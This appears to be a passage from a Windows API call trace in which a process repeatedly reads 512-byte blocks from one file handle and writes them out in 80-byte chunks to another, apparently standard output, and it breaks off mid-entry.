[0212.807] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] GetFileType (hFile=0x50) returned 0x1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.807] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.807] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.807] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.807] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] GetFileType (hFile=0x50) returned 0x1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] GetFileType (hFile=0x50) returned 0x1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] GetFileType (hFile=0x50) returned 0x1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 
[0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] GetFileType (hFile=0x50) returned 0x1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] GetFileType (hFile=0x50) returned 0x1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] GetFileType (hFile=0x50) returned 0x1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] GetFileType (hFile=0x50) returned 0x1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] GetFileType (hFile=0x50) returned 0x1 [0212.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.808] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.809] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0212.809] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.809] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.809] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] GetFileType (hFile=0x50) returned 0x1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] GetFileType (hFile=0x50) returned 0x1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] GetFileType (hFile=0x50) returned 0x1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] GetFileType (hFile=0x50) returned 0x1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] GetFileType (hFile=0x50) returned 0x1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] GetFileType (hFile=0x50) returned 0x1 [0212.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.809] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] GetFileType (hFile=0x50) returned 0x1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] GetFileType (hFile=0x50) returned 0x1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.810] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.810] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] GetFileType (hFile=0x50) returned 0x1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] GetFileType 
(hFile=0x50) returned 0x1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] GetFileType (hFile=0x50) returned 0x1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] GetFileType (hFile=0x50) returned 0x1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] GetFileType (hFile=0x50) returned 0x1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.810] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] GetFileType (hFile=0x50) returned 0x1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] GetFileType (hFile=0x50) returned 0x1 [0212.811] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] GetFileType (hFile=0x50) returned 0x1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.811] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.811] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.811] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.811] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] GetFileType (hFile=0x50) returned 0x1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] GetFileType (hFile=0x50) returned 0x1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] GetFileType (hFile=0x50) returned 0x1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, 
lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] GetFileType (hFile=0x50) returned 0x1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] GetFileType (hFile=0x50) returned 0x1 [0212.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.811] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] GetFileType (hFile=0x50) returned 0x1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] GetFileType (hFile=0x50) returned 0x1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] GetFileType (hFile=0x50) returned 0x1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, 
lpOverlapped=0x0) returned 1 [0212.812] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.812] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.812] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.812] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] GetFileType (hFile=0x50) returned 0x1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] GetFileType (hFile=0x50) returned 0x1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] GetFileType (hFile=0x50) returned 0x1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] GetFileType (hFile=0x50) returned 0x1 [0212.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.812] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] GetFileType (hFile=0x50) returned 0x1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] WriteFile (in: hFile=0x50, 
lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] GetFileType (hFile=0x50) returned 0x1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] GetFileType (hFile=0x50) returned 0x1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] GetFileType (hFile=0x50) returned 0x1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.813] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.813] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] GetFileType (hFile=0x50) returned 0x1 [0212.813] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0212.813] GetFileType (hFile=0x50) returned 0x1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] GetFileType (hFile=0x50) returned 0x1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.813] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] GetFileType (hFile=0x50) returned 0x1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] GetFileType (hFile=0x50) returned 0x1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] GetFileType (hFile=0x50) returned 0x1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 
[0212.814] GetFileType (hFile=0x50) returned 0x1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] GetFileType (hFile=0x50) returned 0x1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.814] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.814] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.814] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.814] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] GetFileType (hFile=0x50) returned 0x1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] GetFileType (hFile=0x50) returned 0x1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.814] GetFileType (hFile=0x50) returned 0x1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, 
lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] GetFileType (hFile=0x50) returned 0x1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] GetFileType (hFile=0x50) returned 0x1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] GetFileType (hFile=0x50) returned 0x1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] GetFileType (hFile=0x50) returned 0x1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] GetFileType (hFile=0x50) returned 0x1 [0212.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.815] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: 
